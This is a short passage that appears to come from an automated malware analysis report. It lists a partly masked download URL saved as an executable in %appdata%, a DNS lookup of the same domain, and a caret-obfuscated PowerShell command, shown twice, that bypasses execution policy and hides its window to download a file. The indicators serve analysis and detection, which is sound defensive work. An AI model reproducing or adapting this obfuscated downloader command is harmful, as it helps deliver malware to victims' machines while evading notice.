Technical Information
- http://ar####ectureky.bid/user.php?f=##### as %appdata%.exe
- DNS ASK ar####ectureky.bid
- '<SYSTEM32>\cmd.exe' /c pOw^er^sheLl.e^xe ^-^e^xe^cUtiO^NpoL^ic^Y ^B^Ypas^s -n^OP^ROf^ile -w^iNdo^wst^yL^e h^IddeN (ne^w-OBJe^ct sy^st^em.^Ne^t^.webcLi^e^nt)^.dow^nloa^d^F^I^le(^'http://ar####ecture...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c pOw^er^sheLl.e^xe ^-^e^xe^cUtiO^NpoL^ic^Y ^B^Ypas^s -n^OP^ROf^ile -w^iNdo^wst^yL^e h^IddeN (ne^w-OBJe^ct sy^st^em.^Ne^t^.webcLi^e^nt)^.dow^nloa^d^F^I^le(^'http://ar####ecture...